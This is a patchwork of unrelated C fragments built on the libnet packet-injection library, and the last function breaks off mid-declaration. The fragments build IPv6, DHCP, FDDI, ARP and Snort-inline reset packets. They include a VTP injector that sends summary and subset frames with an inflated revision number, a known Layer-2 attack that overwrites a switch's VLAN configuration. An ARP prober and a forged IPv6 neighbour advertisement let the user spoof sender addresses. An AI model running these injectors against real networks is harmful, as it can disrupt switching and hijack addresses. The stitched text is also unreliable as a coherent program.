int
main(int argc, char *argv[])
{
libnet_t *l;
int r;
char *device = "eth0";
struct libnet_ether_addr *mac_address;
struct in6_addr src_ip;
struct libnet_in6_addr dst_ip;
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_ptag_t icmp_ptag = 0;
libnet_ptag_t ipv6_ptag = 0;
char payload[24] = { 0 };
memset(&src_ip, 0x66, sizeof(src_ip));
l = libnet_init( LIBNET_RAW6, device, errbuf);
assert(l);
mac_address = libnet_get_hwaddr(l);
assert(mac_address);
dst_ip = libnet_name2addr6(l, "::1" /* BCAST_ADDR - defined where? */, LIBNET_DONT_RESOLVE);
memcpy(payload,src_ip.s6_addr,16);
payload[16] = 2; /* 2 for Target Link-layer Address */
payload[17] = 1; /* The length of the option */
memcpy(payload+18,mac_address->ether_addr_octet, 6);
/* 0x2000: RSO */
icmp_ptag = libnet_build_icmpv4_echo(
136,0,0,0x2000,0,
(uint8_t *)payload,sizeof(payload), l, LIBNET_PTAG_INITIALIZER);
assert(icmp_ptag);
ipv6_ptag = libnet_build_ipv6(
0, 0,
LIBNET_ICMPV6_H + sizeof(payload), /* ICMPV6_H == ICMPV4_H, luckily */
IPPROTO_ICMP6,
255,
*(struct libnet_in6_addr*)&src_ip,
dst_ip,
NULL, 0,
l, 0);
assert(icmp_ptag);
print_pblocks(l);
{
uint8_t* pkt1 = NULL;
uint32_t pkt1_sz = 0;
r = libnet_pblock_coalesce(l, &pkt1, &pkt1_sz);
assert(r >= 0);
libnet_diag_dump_hex(pkt1, LIBNET_IPV6_H, 0, stdout);
libnet_diag_dump_hex(pkt1+LIBNET_IPV6_H, pkt1_sz-LIBNET_IPV6_H, 0, stdout);
free(pkt1);
pkt1 = NULL;
}
r = libnet_write(l);
assert(r >= 0);
return (EXIT_SUCCESS);
}
int
main(int argc, char *argv[])
{
char *intf;
u_long src_ip, options_len, orig_len;
int i;
libnet_t *l;
libnet_ptag_t t;
libnet_ptag_t ip;
libnet_ptag_t udp;
libnet_ptag_t dhcp;
struct libnet_ether_addr *ethaddr;
struct libnet_stats ls;
char errbuf[LIBNET_ERRBUF_SIZE];
u_char options_req[] = { LIBNET_DHCP_SUBNETMASK , LIBNET_DHCP_BROADCASTADDR , LIBNET_DHCP_TIMEOFFSET , LIBNET_DHCP_ROUTER , LIBNET_DHCP_DOMAINNAME , LIBNET_DHCP_DNS , LIBNET_DHCP_HOSTNAME };
u_char *options;
u_char enet_dst[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};
u_char *tmp;
// have to specify interface
if (argc != 2)
usage(argv[0]);
intf = argv[1];
l = libnet_init(
LIBNET_LINK, // injection type
intf, // network interface
errbuf); // errbuf
if (!l)
{
fprintf(stderr, "libnet_init: %s", errbuf);
exit(EXIT_FAILURE);
}
else {
src_ip = libnet_get_ipaddr4(l);;
if ((ethaddr = libnet_get_hwaddr(l)) == NULL)
{
fprintf(stderr, "libnet_get_hwaddr: %s\n", libnet_geterror(l));
exit(EXIT_FAILURE);
}
printf("ip addr : %s\n", libnet_addr2name4(src_ip, LIBNET_DONT_RESOLVE));
printf("eth addr : ");
for (i = 0; i < 6; i++) {
printf("%x", ethaddr->ether_addr_octet[i]);
if (i != 5) {
printf(":");
}
}
printf("\n");
// build options packet
i = 0;
options_len = 3; // update total payload size
// we are a discover packet
options = malloc(3);
options[i++] = LIBNET_DHCP_MESSAGETYPE; // type
options[i++] = 1; // len
options[i++] = LIBNET_DHCP_MSGDISCOVER; // data
orig_len = options_len;
options_len += sizeof(options_req) + 2; // update total payload size
// workaround for realloc on old machines
// options = realloc(options, options_len); // resize options buffer
tmp = malloc(options_len);
memcpy(tmp, options, orig_len);
free(options);
options = tmp;
// we are going to request some parameters
options[i++] = LIBNET_DHCP_PARAMREQUEST; // type
options[i++] = sizeof(options_req); // len
memcpy(options + i, options_req, sizeof(options_req)); // data
i += sizeof(options_req);
// if we have an ip already, let's request it.
if (src_ip)
{
orig_len = options_len;
options_len += 2 + sizeof(src_ip);
// workaround for realloc on old machines
// options = realloc(options, options_len);
tmp = malloc(options_len);
memcpy(tmp, options, orig_len);
free(options);
options = tmp;
options[i++] = LIBNET_DHCP_DISCOVERADDR; // type
options[i++] = sizeof(src_ip); // len
memcpy(options + i, (char *)&src_ip, sizeof(src_ip));// data
i += sizeof(src_ip);
}
// end our options packet
options[i] = LIBNET_DHCP_END;
// make sure we are at least the minimum length, if not fill
// this could go in libnet, but we will leave it in the app for now
if (options_len + LIBNET_DHCPV4_H < LIBNET_BOOTP_MIN_LEN)
{
orig_len = options_len;
options_len = LIBNET_BOOTP_MIN_LEN - LIBNET_DHCPV4_H;
// workaround for realloc on old machines
// options = realloc(options, options_len);
tmp = malloc(options_len);
memcpy(tmp, options, orig_len);
free(options);
options = tmp;
memset(options + i, 0, options_len - i);
}
// the goodies are here
dhcp = libnet_build_dhcpv4(
LIBNET_DHCP_REQUEST, // opcode
1, // hardware type
6, // hardware address length
0, // hop count
0xdeadbeef, // transaction id
0, // seconds since bootstrap
0x8000, // flags
0, // client ip
0, // your ip
0, // server ip
0, // gateway ip
ethaddr->ether_addr_octet, // client hardware addr
NULL, // server host name
NULL, // boot file
options, // dhcp options stuck in payload since it is dynamic
options_len, // length of options
l, // libnet handle
0); // libnet id
// wrap it
udp = libnet_build_udp(
68, // source port
67, // destination port
LIBNET_UDP_H + LIBNET_DHCPV4_H + options_len, // packet size
0, // checksum
NULL, // payload
0, // payload size
l, // libnet handle
0); // libnet id
// hook me up with some ipv4
ip = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_UDP_H + LIBNET_DHCPV4_H
+ options_len, // length
0x10, // TOS
0, // IP ID
0, // IP Frag
16, // TTL
IPPROTO_UDP, // protocol
0, // checksum
src_ip, // src ip
inet_addr("255.255.255.255"), // destination ip
NULL, // payload
0, // payload size
l, // libnet handle
0); // libnet id
// we can just autobuild since we arent doing anything tricky
t = libnet_autobuild_ethernet(
enet_dst, // ethernet destination
ETHERTYPE_IP, // protocol type
l); // libnet handle
// write to the wire
if (libnet_write(l) == -1)
{
fprintf(stderr, " %s: libnet_write: %s\n", argv[0],
strerror(errno));
exit(EXIT_FAILURE);
}
// fill and print stats
libnet_stats(l, &ls);
fprintf(stderr, "Packets sent: %ld\n"
"Packet errors: %ld\n"
"Bytes written: %ld\n",
ls.packets_sent, ls.packet_errors, ls.bytes_written);
libnet_destroy(l);
// free mem
free(options);
exit(0);
}
exit(0);
}
libnet_ptag_t
libnet_autobuild_fddi(u_int8_t fc, u_int8_t *dst, u_int8_t dsap, u_int8_t ssap,
u_int8_t cf, u_int8_t *org, u_int16_t type, libnet_t *l)
{
u_int32_t n, h;
u_int16_t protocol_type;
struct libnet_fddi_addr *src;
libnet_pblock_t *p;
libnet_ptag_t ptag;
struct libnet_fddi_hdr fddi_hdr;
if (l == NULL)
{
return (-1);
}
/* sanity check injection type if we're not in advanced mode */
if (l->injection_type != LIBNET_LINK &&
!(((l->injection_type) & LIBNET_ADV_MASK)))
{
snprintf(l->err_buf, LIBNET_ERRBUF_SIZE,
"%s(): called with non-link layer wire injection primitive",
__func__);
p = NULL;
goto bad;
}
n = LIBNET_FDDI_H;
h = 0;
ptag = LIBNET_PTAG_INITIALIZER;
/* FDDI and Ethernet have the same address size - so just typecast */
src = (struct libnet_fddi_addr *) libnet_get_hwaddr(l);
if (src == NULL)
{
/* err msg set in libnet_get_hwaddr() */
return (-1);
}
p = libnet_pblock_probe(l, ptag, n, LIBNET_PBLOCK_FDDI_H);
if (p == NULL)
{
return (-1);
}
memset(&fddi_hdr, 0, sizeof(fddi_hdr));
fddi_hdr.fddi_frame_control = fc; /* Class/Format/Priority */
memcpy(fddi_hdr.fddi_dhost, dst, FDDI_ADDR_LEN); /* destination fddi address */
memcpy(fddi_hdr.fddi_shost, src, FDDI_ADDR_LEN); /* source fddi address */
fddi_hdr.fddi_llc_dsap = dsap; /* */
fddi_hdr.fddi_llc_ssap = ssap; /* */
fddi_hdr.fddi_llc_control_field = cf; /* Class/Format/Priority */
memcpy(&fddi_hdr.fddi_llc_org_code, org, LIBNET_ORG_CODE_SIZE);
/* Deal with unaligned int16_t for type */
protocol_type = htons(type);
memcpy(&fddi_hdr.fddi_type, &protocol_type, sizeof(int16_t)); /* Protocol Type */
n = libnet_pblock_append(l, p, (u_int8_t *)&fddi_hdr, LIBNET_FDDI_H);
if (n == -1)
{
goto bad;
}
return (libnet_pblock_update(l, p, h, LIBNET_PBLOCK_FDDI_H));
bad:
libnet_pblock_delete(l, p);
return (-1);
}
int main( int argc, char *argv[] )
{
int opt,k=0;
extern char *optarg;
libnet_ptag_t t;
libnet_t *lhandler;
u_int32_t vtp_len=0, sent;
struct vtp_summary *vtp_summ;
struct vtp_subset *vtp_sub;
u_int8_t *vtp_packet,*vtp_packet2, *aux;
u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 };
u_int8_t dst_mac[6]={ 0x01,0x00,0x0c,0xcc,0xcc,0xcc };
u_int8_t aaa[8]={ 0x22,0x00,0x11,0x22,0x11,0x00, 0x00,0x00 };
struct libnet_ether_addr *mymac;
char *device;
char error_information[LIBNET_ERRBUF_SIZE];
char *domain;
// get options
while ((opt = getopt(argc, argv, "i:d:")) != -1)
{
switch (opt) {
case 'i':
device=malloc(strlen(optarg));
strcpy(device,optarg);
k=1;
break;
case 'd':
domain=malloc(strlen(optarg));
strcpy(domain,optarg);
break;
default: usage(argv[0]);
}
}
if(!k) { printf(" %s -i <interface> -d <vtp domain>\n must assign the interface\n",argv[0]);exit(1);}
//init libnet
lhandler=libnet_init(LIBNET_LINK,device,error_information);
if (!lhandler) {
fprintf(stderr, "libnet_init: %s\n", error_information);
return -1;
}
mymac=libnet_get_hwaddr(lhandler);
//build the first packet for vtp_summary
vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary);
vtp_packet = calloc(1,vtp_len);
aux = vtp_packet;
memcpy(vtp_packet,cisco_data,sizeof(cisco_data));
aux+=sizeof(cisco_data);
vtp_summ = (struct vtp_summary *)aux;
vtp_summ->version = 0x01;
vtp_summ->code = 0x01;//vtp_summary
vtp_summ->followers = 0x01;
vtp_summ->dom_len = strlen(domain);
memcpy(vtp_summ->domain,domain,strlen(domain));
vtp_summ->revision = htonl(2000);//bigger than the current revision number will ok
t = libnet_build_802_2(
0xaa, /* DSAP */
0xaa, /* SSAP */
0x03, /* control */
vtp_packet, /* payload */
vtp_len, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
t = libnet_build_802_3(
dst_mac, /* ethernet destination */
mymac->ether_addr_octet, /* ethernet source */
LIBNET_802_2_H + vtp_len, /* frame size */
NULL, /* payload */
0, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
sent = libnet_write(lhandler);
if (sent == -1) {
libnet_clear_packet(lhandler);
free(vtp_packet);
return -1;
}
libnet_clear_packet(lhandler);
//build the second vtp packet for vtp_subset
vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset);
vtp_packet2 = calloc(1,vtp_len);
aux = vtp_packet2;
memcpy(vtp_packet2,cisco_data,sizeof(cisco_data));
aux+=sizeof(cisco_data);
vtp_sub = (struct vtp_subset *)aux;
vtp_sub->version = 0x01;
vtp_sub->code = 0x02; //vtp_subset
vtp_sub->seq = 0x01;
vtp_sub->dom_len = strlen(domain);
memcpy(vtp_sub->domain,domain,strlen(domain));
vtp_sub->revision = htonl(2000);//bigger than the current revision number will ok
// memcpy(vtp_sub->aaa,aaa,strlen(aaa));
t = libnet_build_802_2(
0xaa, /* DSAP */
0xaa, /* SSAP */
0x03, /* control */
vtp_packet2, /* payload */
vtp_len, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
t = libnet_build_802_3(
dst_mac, /* ethernet destination */
mymac->ether_addr_octet, /* ethernet source */
LIBNET_802_2_H + vtp_len, /* frame size */
NULL, /* payload */
0, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
sent = libnet_write(lhandler);
if (sent == -1) {
libnet_clear_packet(lhandler);
free(vtp_packet);
return -1;
}
libnet_clear_packet(lhandler);
}
int main(int argc, char ** argv) {
char errbuf[LIBNET_ERRBUF_SIZE];
char errors[PCAP_ERRBUF_SIZE], pfilter[2048];
struct ifreq ifr;
bpf_u_int32 mask=0, net=0;
int st=-1, tries=0;
struct bpf_program filter;
struct myetheraddr *e=NULL;
pcap_t *pdev=NULL;
memset(&ifr, 0, sizeof(ifr));
if (argc != 3) {
printf("FantaIP by KIKI\nUsage: (example) %s eth0 192.168.13.211\n", argv[0]);
exit(1);
}
bob.device=strdup(argv[1]);
assert(bob.device != NULL);
bob.saddr=(uint32_t)inet_addr(argv[2]);
bob.addr_cleared=0;
st=socket(AF_INET, SOCK_DGRAM, 0);
if (st < 0) {
fprintf(stderr, "create socket fails: %s", strerror(errno));
exit(1);
}
bob.l=libnet_init(LIBNET_LINK_ADV, bob.device, errbuf);
if (bob.l == NULL) {
fprintf(stderr, "libnet_init: %s\n", strerror(errno));
exit(1);
}
bob.arp=0;
bob.eth=0;
e=(struct myetheraddr *)libnet_get_hwaddr(bob.l);
if (e == NULL) {
perror("bad things batman");
exit(1);
}
memcpy(&bob.shwaddr, e, sizeof(bob.shwaddr));
snprintf(pfilter, sizeof(pfilter) -1, FILTER);
memset(errors, 0, sizeof(errors));
pcap_lookupnet(bob.device, &net, &mask, errors);
memset(errors, 0, sizeof(errors));
pdev=pcap_open_live(bob.device, 500, 1, 0, errors);
if (util_getheadersize(pdev, errors) != 14) {
fprintf(stderr, "You SURE this is an ethernet interface? doesnt look like one\n");
exit(1);
}
if (util_preparepcap(pdev, errors) < 0) {
fprintf(stderr, "Can't prepare bpf socket: %s\n", strerror(errno));
exit(1);
}
pcap_compile(pdev, &filter, pfilter, 0, net);
pcap_setfilter(pdev, &filter);
/* look for dups */
if (pcap_setnonblock(pdev, 1, errors) < 0) {
fprintf(stderr, "Can't set pcap dev nonblocking: %s\n", errors);
exit(1);
}
bob.addr_cleared=0;
while (bob.addr_cleared == 0 && tries < 3) {
/* lets be sure about this ;] */
broadcast_arp(ARPOP_REQUEST, 0xFFFFFFFF);
broadcast_arp(ARPOP_REQUEST, 0x00000000);
broadcast_arp(ARPOP_REQUEST, bob.saddr);
signal(SIGALRM, &alarm_hndlr);
breakloop=0;
alarm(1);
while (1) {
pcap_dispatch(pdev, -1, &process_packet, NULL);
if (breakloop || bob.addr_cleared != 0) break;
}
alarm(0);
signal(SIGALRM, SIG_DFL);
tries++;
}
alarm(0);
signal(SIGALRM, SIG_DFL);
if (bob.addr_cleared == -1) {
fprintf(stderr, "Error: Address already in use\n");
exit(1);
}
bob.addr_cleared=1;
printf("arping for %s [", inet_ntoa(*((const struct in_addr *)&bob.saddr))); fflush(stdout);
decode_mac(&bob.shwaddr.octet[0]); printf(" ]\n"); fflush(stdout);
/* ok block now */
if (pcap_setnonblock(pdev, 0, errors) < 0) {
fprintf(stderr, "Can't set pcap dev nonblocking: %s\n", errors);
exit(1);
}
pcap_loop(pdev, 0, &process_packet, NULL);
libnet_destroy(bob.l);
exit(0);
}
int
libnet_do_arp(struct libnet_link_int *l, u_char *device, struct ether_addr *e,
u_long ip)
{
int n, i;
u_char *buf, errbuf[256], *packet, *ip_p;
struct libnet_ethernet_hdr *p;
struct libnet_arp_hdr *a;
u_long local_ip;
pcap_t *pd;
struct pcap_pkthdr pc_hdr;
/*
* Initialize a packet.
*/
if (libnet_init_packet(LIBNET_ARP_H + LIBNET_ETH_H, &buf) == -1)
{
perror("libnet_init_packet memory:");
exit(EXIT_FAILURE);
}
/*
* Get the ethernet address of the device.
*/
e = libnet_get_hwaddr(l, device, errbuf);
if (e == NULL)
{
fprintf(stderr, "libnet_get_hwaddr: %s\n", errbuf);
return (-1);
}
/*
* Get the IP address of the device.
*/
local_ip = htonl(libnet_get_ipaddr(l, device, errbuf));
if (!local_ip)
{
fprintf(stderr, "libnet_get_ipaddr: %s\n", errbuf);
return (-1);
}
/*
* Open the pcap device.
*/
pd = pcap_open_live(device, LIBNET_ARP_H + LIBNET_ETH_H, 1, 500, errbuf);
if (pd == NULL)
{
fprintf(stderr, "pcap_open_live: %s\n", errbuf);
return (-1);
}
/*
* Ethernet header
*/
libnet_build_ethernet(
enet_dst, /* broadcast ethernet address */
e->ether_addr_octet, /* source ethernet address */
ETHERTYPE_ARP, /* this frame holds an ARP packet */
NULL, /* payload */
0, /* payload size */
buf); /* packet header memory */
/*
* ARP header
*/
libnet_build_arp(
ARPHRD_ETHER, /* hardware address type */
ETHERTYPE_IP, /* protocol address type */
ETHER_ADDR_LEN, /* hardware address length */
4, /* protocol address length */
ARPOP_REQUEST, /* packet type - ARP request */
e->ether_addr_octet, /* source (local) ethernet address */
(u_char *)&local_ip, /* source (local) IP address */
enet_dst, /* target's ethernet address (broadcast) */
(u_char *)&ip, /* target's IP address */
NULL, /* payload */
0, /* payload size */
buf + LIBNET_ETH_H); /* packet header memory */
n = libnet_write_link_layer(l, device, buf, LIBNET_ARP_H + LIBNET_ETH_H);
if (n == -1)
{
fprintf(stderr, "libnet_write_link_layer choked\n");
return (-1);
}
printf("Sent a %d byte ARP request looking for the MAC of %s.\n",
n, libnet_host_lookup(ip, 0));
printf("Waiting for a response...\n");
for (;(packet = ((u_char *)pcap_next(pd, &pc_hdr)));)
{
p = (struct libnet_ethernet_hdr *)(packet);
if (ntohs(p->ether_type) == ETHERTYPE_ARP)
{
a = (struct libnet_arp_hdr *)(packet + LIBNET_ETH_H);
if (ntohs(a->ar_op) == ARPOP_REPLY)
{
ip_p = (u_char *)&ip;
if (IP_UCHAR_COMP(a->ar_spa, ip_p))
{
printf("Target hardware address: ");
for (i = 0; i < 6; i++)
{
printf("%x", a->ar_sha[i]);
if (i != 5)
{
printf(":");
}
}
printf("\n");
}
}
}
}
libnet_destroy_packet(&buf);
return (n);
}
static void
RejectLayer2(ipq_packet_msg_t *m)
{
IPHdr *iph;
TCPHdr *tcph;
ICMPHdr *icmph;
EtherHdr *eh;
int proto;
int size = 0;
int payload_len = 0;
/* pointer to the device to use: according to the libnet manpage
* this should be u_char, but I get a compiler warning then.
* Making it a char fixes that. VJ. */
char *device = NULL;
/* to get the mac address of the interface when in layer2 mode */
struct ether_addr *link_addr;
u_char enet_dst[6]; /* mac addr for creating the ethernet packet. */
u_char enet_src[6]; /* mac addr for creating the ethernet packet. */
struct libnet_link_int *network = NULL; /* pointer to link interface struct */
int i = 0;
iph = (IPHdr *)(l_tcp + ETH_H);
proto = tmpP->iph->ip_proto;
iph->ip_src.s_addr = tmpP->iph->ip_dst.s_addr;
iph->ip_dst.s_addr = tmpP->iph->ip_src.s_addr;
/* set the interface. For Nat/Ip-mode the device we use to send a reset to the offender
* is the device on which the packet entered. For bridge-mode indev and outdev are always
* equal, so we use indev as well. There is one rare exception to this... if on the Snort_
* inline box a client is run that causes a reset, indev is not set but outdev. */
if(m->indev_name[0] != '\0')
device = m->indev_name;
else
device = m->outdev_name;
/* Let's initialize Libnet */
if((network = libnet_open_link_interface(device, errbuf)) == NULL)
{
libnet_error(LIBNET_ERR_FATAL,
"libnet_open_link_interface for device %s failed: %s\n",
device, errbuf);
return;
}
/* lets get the mac addr of the interface */
if(!(link_addr = libnet_get_hwaddr(network, device, errbuf)))
{
libnet_error(LIBNET_ERR_FATAL,
"libnet_get_hwaddr failed: %s\n",
errbuf);
return;
}
/* copy the mac: the src is set the the interface mac
* but only if the mac wasn't supplied in the configfile */
if(pv.enet_src[0] == 0 && pv.enet_src[1] == 0 && pv.enet_src[2] == 0 && pv.enet_src[3] == 0 && pv.enet_src[4] == 0 && pv.enet_src[5] == 0)
{
/* either user set mac as 00:00:00:00:00:00 or it is blank */
for(i = 0; i < 6; i++)
enet_src[i] = link_addr->ether_addr_octet[i];
}
else
{
for(i = 0; i < 6; i++)
enet_src[i] = pv.enet_src[i];
}
/* copy the mac: the old src now becomes dst */
for(i = 0; i < 6; i++)
enet_dst[i] = m->hw_addr[i];
//printf("reset src mac: %02X:%02X:%02X:%02X:%02X:%02X\n", enet_src[0],enet_src[1],enet_src[2],enet_src[3],enet_src[4],enet_src[5]);
//printf("reset dst mac: %02X:%02X:%02X:%02X:%02X:%02X\n", enet_dst[0],enet_dst[1],enet_dst[2],enet_dst[3],enet_dst[4],enet_dst[5]);
switch(proto)
{
case IPPROTO_TCP:
if (!tmpP->frag_flag)
{
size = ETH_H + IP_H + TCP_H;
eh = (EtherHdr *)l_tcp;
iph = (IPHdr *)(l_tcp + ETH_H);
tcph = (TCPHdr *)(l_tcp + ETH_H + IP_H);
iph->ip_src.s_addr = tmpP->iph->ip_dst.s_addr;
iph->ip_dst.s_addr = tmpP->iph->ip_src.s_addr;
tcph->th_sport = tmpP->tcph->th_dport;
tcph->th_dport = tmpP->tcph->th_sport;
tcph->th_seq = tmpP->tcph->th_ack;
tcph->th_ack = htonl(ntohl(tmpP->tcph->th_seq) + 1);
//printf("Send TCP Rst in Bridge-mode.\n");
/* calculate the checksums */
if (libnet_do_checksum(l_tcp + ETH_H, IPPROTO_TCP, TCP_H) == -1)
{
libnet_error(LIBNET_ERR_CRITICAL,
"SendEthTCPRST: libnet_do_checksum failed for TCP_H");
return;
}
if (libnet_do_checksum(l_tcp + ETH_H, IPPROTO_IP, IP_H) == -1)
{
libnet_error(LIBNET_ERR_CRITICAL,
"SendEthTCPRST: libnet_do_checksum failed for IP_H");
return;
}
/* build the ethernet packet */
if (libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_IP, NULL, 0, l_tcp) == -1)
{
libnet_error(LIBNET_ERR_CRITICAL,
"SendEthTCPRST: libnet_build_ethernet");
return;
}
/* finally write it to the link */
if(libnet_write_link_layer(network, device, l_tcp, size) < size)
{
libnet_error(LIBNET_ERR_CRITICAL,
"SendEthTCPRST: libnet_write_link_layer");
return;
}
} /* end if !tmpP->frag_flag */
break;
case IPPROTO_UDP:
if (!tmpP->frag_flag)
{
eh = (EtherHdr *)l_icmp;
iph = (IPHdr *)(l_icmp + ETH_H);
icmph = (ICMPHdr *) (l_icmp + ETH_H + IP_H);
iph->ip_src.s_addr = tmpP->iph->ip_dst.s_addr;
iph->ip_dst.s_addr = tmpP->iph->ip_src.s_addr;
if ((payload_len = ntohs(tmpP->iph->ip_len) -
(IP_HLEN(tmpP->iph) << 2)) > 8)
{
payload_len = 8;
}
memcpy((char *)icmph + ICMP_UNREACH_H, tmpP->iph,
(IP_HLEN(tmpP->iph) << 2) + payload_len);
size = ETH_H + IP_H + ICMP_UNREACH_H +
(IP_HLEN(tmpP->iph) << 2) + payload_len;
iph->ip_len = htons(size);
/* calculate the checksums */
if (libnet_do_checksum(l_icmp + ETH_H, IPPROTO_ICMP, size - IP_H) == -1)
{
libnet_error(LIBNET_ERR_CRITICAL,
"SendEthICMPRST: libnet_do_checksum failed for IPPROTO_ICMP");
return;
}
if (libnet_do_checksum(l_icmp + ETH_H, IPPROTO_IP, IP_H) == -1)
{
libnet_error(LIBNET_ERR_CRITICAL,
"SendEthICMPRST: libnet_do_checksum failed for IPPROTO_IP");
return;
}
/* build the ethernet packet */
if (libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_IP, NULL, 0, l_icmp) == -1)
{
libnet_error(LIBNET_ERR_CRITICAL,
"SendEthICMPRST: libnet_build_ethernet");
return;
}
/* finally write it to the link */
//printf("Send ICMP Rst in Bridge-mode.\n");
if(libnet_write_link_layer(network, device, l_icmp, size) < size)
{
libnet_error(LIBNET_ERR_CRITICAL,
"SendEthICMPRST: libnet_write_link_layer");
return;
}
}
break;
} /* end switch(proto) */
/* clean up file-descriptors for the next time we call RejectLayer2 */
if((libnet_close_link_interface(network)) == -1)
{
libnet_error(LIBNET_ERR_CRITICAL,
"libnet_close_link_interface error\n");
}
}
int main(int argc, char *argv[]) {
int r;
int i;
int c;
char ebuf[LIBNET_ERRBUF_SIZE];
struct ether_addr broadcast_ea;
struct ether_addr *sea;
struct ether_addr tea;
struct in_addr sip, tip;
uint8_t *arp_probe_packet;
int sock_fd;
struct ifreq ifr;
char *if_name = "eth0";
struct libnet_link_int *lin;
uint32_t tmp[6];
broadcast_ea.ether_addr_octet[0] = 0xFF;
broadcast_ea.ether_addr_octet[1] = 0xFF;
broadcast_ea.ether_addr_octet[2] = 0xFF;
broadcast_ea.ether_addr_octet[3] = 0xFF;
broadcast_ea.ether_addr_octet[4] = 0xFF;
broadcast_ea.ether_addr_octet[5] = 0xFF;
while ((c = getopt(argc, argv, "hi:")) != EOF) {
switch (c) {
case 'h':
usage(0);
case 'i':
if_name = optarg;
break;
default:
print("unknown argument: %s\n", optarg);
usage(1);
}
}
// initialize libnet link-level access to the network interface
lin = libnet_open_link_interface(if_name, ebuf);
if (!lin) die("libnet_open_link_interface(\"%s\"): %s\n", if_name, ebuf);
// get the Ethernet address of this interface
sea = libnet_get_hwaddr(lin, if_name, ebuf);
if (!sea) die("libnet_get_hwaddr(\"%s\"): %s\n", if_name, ebuf);
// get the IP address of this interface
sock_fd = socket(PF_INET, SOCK_DGRAM, IPPROTO_IP);
if (sock_fd < 0) die("cannot create socket: %s\n", strerror(errno));
strncpy(ifr.ifr_name, if_name, IFNAMSIZ - 1);
ifr.ifr_name[IFNAMSIZ - 1] = (char)NULL;
ifr.ifr_addr.sa_family = AF_INET;
r = ioctl(sock_fd, SIOCGIFADDR, &ifr);
if (r < 0) die("SIOCSIFADDR error: %s\n", strerror(errno));
sip = ((struct sockaddr_in *)&ifr.ifr_addr)->sin_addr;
close(sock_fd);
for (i = optind; i < argc; i ++) {
if (strncmp(argv[i], "sip=", 4) == 0) {
r = inet_aton(&argv[i][4], &sip);
if (r == 0) die("invalid sip\n");
} else if (strncmp(argv[i], "sea=", 4) == 0) {
r = sscanf(
argv[i],
"sea=%X:%X:%X:%X:%X:%X",
&tmp[0],
&tmp[1],
&tmp[2],
&tmp[3],
&tmp[4],
&tmp[5]
);
sea->ether_addr_octet[0] = tmp[0];
sea->ether_addr_octet[1] = tmp[1];
sea->ether_addr_octet[2] = tmp[2];
sea->ether_addr_octet[3] = tmp[3];
sea->ether_addr_octet[4] = tmp[4];
sea->ether_addr_octet[5] = tmp[5];
if (r != 6) die("invalid sea\n");
} else if (strncmp(argv[i], "tip=", 4) == 0) {
r = inet_aton(&argv[i][4], &tip);
if (r == 0) die("invalid tip\n");
} else if (strncmp(argv[i], "tea=", 4) == 0) {
r = sscanf(
argv[i],
"tea=%X:%X:%X:%X:%X:%X",
&tmp[0],
&tmp[1],
&tmp[2],
&tmp[3],
&tmp[4],
&tmp[5]
);
tea.ether_addr_octet[0] = tmp[0];
tea.ether_addr_octet[1] = tmp[1];
tea.ether_addr_octet[2] = tmp[2];
tea.ether_addr_octet[3] = tmp[3];
tea.ether_addr_octet[4] = tmp[4];
tea.ether_addr_octet[5] = tmp[5];
if (r != 6) die("invalid tea\n");
} else {
die("unknown arg: %s\n", argv[i]);
}
}
print("interface %s\n", if_name);
print(" sip: %s\n", inet_ntoa(sip));
print(" sea: %02X:%02X:%02X:%02X:%02X:%02X\n",
sea->ether_addr_octet[0],
sea->ether_addr_octet[1],
sea->ether_addr_octet[2],
sea->ether_addr_octet[3],
sea->ether_addr_octet[4],
sea->ether_addr_octet[5]
);
print(" tip: %s\n", inet_ntoa(tip));
print(" tea: %02X:%02X:%02X:%02X:%02X:%02X\n",
tea.ether_addr_octet[0],
tea.ether_addr_octet[1],
tea.ether_addr_octet[2],
tea.ether_addr_octet[3],
tea.ether_addr_octet[4],
tea.ether_addr_octet[5]
);
// allocate memory for the ARP probe packet
r = libnet_init_packet(LIBNET_ETH_H + LIBNET_ARP_H, &arp_probe_packet);
if (r == -1) die("libnet_init_packet(): error\n");
// build the Ethernet header of the ARP probe packet
r = libnet_build_ethernet(
broadcast_ea.ether_addr_octet,
sea->ether_addr_octet,
ETHERTYPE_ARP,
NULL, 0, // payload pointer and size
arp_probe_packet
);
if (r == -1) die("libnet_build_ethernet(): error\n");
// build the ARP header
r = libnet_build_arp(
ARPHRD_ETHER,
ETHERTYPE_IP,
ETH_ALEN,
4,
ARPOP_REQUEST,
sea->ether_addr_octet, (uint8_t *)&sip.s_addr,
tea.ether_addr_octet, (uint8_t *)&tip.s_addr,
NULL, 0, // payload pointer and size
arp_probe_packet + LIBNET_ETH_H
);
if (r == -1) die("libnet_build_arp(): error\n");
r = libnet_write_link_layer(
lin,
if_name,
arp_probe_packet,
LIBNET_ARP_H + LIBNET_ETH_H
);
if (r == -1) die("libnet_write_link_layer(): error\n");
return 0;
}
/*
* injection_write_ip
*
* Description:
* - Write an IP packet into the wire. It can use either raw sockets
* or the wire
*
* Inputs:
* - ip_packet: the IP packet
*
* Outputs:
* - return: 0 if ok, <0 if there were problems
*
*/
int injection_write_ip (u_char *ip_packet)
{
#if defined(INJECT_USING_RAW_SOCKETS) || defined(INJECT_USING_LINK_LAYER)
int i;
u_int16_t packet_size = ntohs(*(u_int16_t*)(ip_packet+2));
#endif
#if defined(INJECT_USING_RAW_SOCKETS)
int network;
/* network initialization */
if ((network = libnet_open_raw_sock(IPPROTO_RAW)) < 0) {
return WIRE_ERR_PKTD_INJECTION_OPEN;
/* packet injection */
} else if ((i = libnet_write_ip (network, ip_packet, packet_size))
< packet_size) {
return WIRE_ERR_PKTD_INJECTION_WRITE_IP;
/* shut down the interface */
} else if (libnet_close_raw_sock (network) < 0) {
return WIRE_ERR_PKTD_INJECTION_CLOSE;
}
return WIRE_ERR_NONE;
#elif defined(INJECT_USING_LINK_LAYER)
char buffer[LIBNET_ETH_H+IP_MAXPACKET];
struct in_addr in;
int size = 1024;
struct libnet_link_int *network; /* pointer to link interface struct */
char *interface = NULL; /* pointer to the device to use */
